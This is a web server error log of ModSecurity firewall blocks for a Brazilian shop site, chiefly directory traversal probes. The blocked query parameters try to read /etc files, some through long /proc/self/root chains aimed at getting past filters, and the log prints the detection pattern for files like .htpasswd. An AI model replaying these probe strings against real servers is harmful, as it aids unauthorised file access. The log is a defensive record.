[Fri Mar 20 11:35:43.790365 2026] [:error] [pid 7235:tid 140411641214720] [client 57.141.18.4:53486] [client 57.141.18.4] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1bP_qxLDW4GITHUkQY0QAAAQw"]
[Fri Mar 20 11:35:44.038349 2026] [:error] [pid 9818:tid 140411582465792] [client 57.141.18.1:53496] [client 57.141.18.1] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1bQF1pVZ5mVmJwsFNdVQAAAFM"]
[Fri Mar 20 11:35:53.155517 2026] [:error] [pid 7235:tid 140411641214720] [client 74.7.244.43:44586] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ab1bSfqxLDW4GITHUkQY4QAAAQw"]
[Fri Mar 20 11:36:03.135898 2026] [:error] [pid 7235:tid 140411607643904] [client 57.141.18.65:54150] [client 57.141.18.65] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/sysctl.conf.rpmnew"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1bU_qxLDW4GITHUkQY8wAAARA"]
[Fri Mar 20 11:36:12.507718 2026] [:error] [pid 15826:tid 140411590858496] [client 57.141.18.103:54434] [client 57.141.18.103] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1bXOoXxyEfFpUF8f-uggAAAVI"]
[Fri Mar 20 11:36:54.699210 2026] [:error] [pid 26799:tid 140411599251200] [client 74.7.243.128:43336] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1bhta6ubjKNq_cu4YKsgAAA1E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 11:37:00.700342 2026] [:error] [pid 7893:tid 140411708356352] [client 74.7.241.31:38626] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1bjBCii7xarUs8iHaZ2gAAAgQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 11:37:01.291790 2026] [mime_magic:error] [pid 15826:tid 140411616036608] (70014)End of file found: [client 57.141.18.18:55808] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 11:37:02.396793 2026] [:error] [pid 15826:tid 140411599251200] [client 74.7.241.31:48502] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1bjuoXxyEfFpUF8f-uogAAAVE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 11:37:04.872849 2026] [:error] [pid 15826:tid 140411741927168] [client 74.7.241.31:48502] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1bkOoXxyEfFpUF8f-upgAAAUA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 11:37:06.251340 2026] [:error] [pid 10189:tid 140411699963648] [client 74.7.241.31:48514] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1bkjJ3M9BSuKP7CAZWtgAAAIU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 11:37:17.395427 2026] [:error] [pid 7235:tid 140411691570944] [client 74.7.241.31:43450] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1bnfqxLDW4GITHUkQZLAAAAQY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 11:37:18.811733 2026] [:error] [pid 7893:tid 140411716749056] [client 74.7.241.31:37076] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1bnhCii7xarUs8iHaZ5gAAAgM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 11:37:20.130071 2026] [:error] [pid 7893:tid 140411691570944] [client 74.7.241.31:37090] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1boBCii7xarUs8iHaZ6AAAAgY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 11:37:21.409981 2026] [:error] [pid 15826:tid 140411590858496] [client 74.7.241.31:37106] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1boeoXxyEfFpUF8f-urQAAAVI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 11:37:22.772577 2026] [:error] [pid 7235:tid 140411708356352] [client 74.7.241.31:37116] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1bovqxLDW4GITHUkQZNQAAAQQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 11:37:24.122466 2026] [:error] [pid 10189:tid 140411641214720] [client 74.7.241.31:37132] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1bpDJ3M9BSuKP7CAZWygAAAIw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 11:38:16.818595 2026] [mime_magic:error] [pid 15826:tid 140411725141760] (70014)End of file found: [client 74.7.241.31:37136] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/sys/fs
[Fri Mar 20 11:38:38.460831 2026] [:error] [pid 7893:tid 140411590858496] [client 74.7.241.31:43596] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1b7hCii7xarUs8iHaaHQAAAhI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 11:39:03.265511 2026] [:error] [pid 26799:tid 140411599251200] [client 57.141.18.30:59286] [client 57.141.18.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/profile.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1cB9a6ubjKNq_cu4YLDAAAA1E"]
[Fri Mar 20 11:39:07.359303 2026] [:error] [pid 11642:tid 140411548894976] [client 57.141.18.49:59456] [client 57.141.18.49] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/vconsole.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1cC7ninkcc-iUj5AqL9gAAA5c"]
[Fri Mar 20 11:39:32.030771 2026] [:error] [pid 9818:tid 140411649607424] [client 74.7.228.61:40734] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ab1cJF1pVZ5mVmJwsFNeFAAAAEs"]
[Fri Mar 20 11:39:38.003541 2026] [:error] [pid 7893:tid 140411548894976] [client 57.141.18.16:60526] [client 57.141.18.16] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/pool.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1cKhCii7xarUs8iHaaNgAAAhc"]
[Fri Mar 20 11:39:38.564249 2026] [:error] [pid 7893:tid 140411708356352] [client 57.141.18.35:60572] [client 57.141.18.35] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1cKhCii7xarUs8iHaaNwAAAgQ"]
[Fri Mar 20 11:39:48.163250 2026] [:error] [pid 15826:tid 140411725141760] [client 57.141.18.104:60858] [client 57.141.18.104] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/logrotate.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1cNOoXxyEfFpUF8f-vBgAAAUI"]
[Fri Mar 20 11:40:14.947299 2026] [:error] [pid 26799:tid 140411666392832] [client 74.7.243.128:51748] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1cTNa6ubjKNq_cu4YLegAAA0k"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 11:40:15.974442 2026] [:error] [pid 10189:tid 140411607643904] [client 57.141.18.89:33374] [client 57.141.18.89] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/iproute2"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1cTzJ3M9BSuKP7CAZXPAAAAJA"]
[Fri Mar 20 11:40:17.913174 2026] [:error] [pid 9818:tid 140411674785536] [client 74.7.243.128:53856] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1cUV1pVZ5mVmJwsFNeNQAAAEg"], referer: 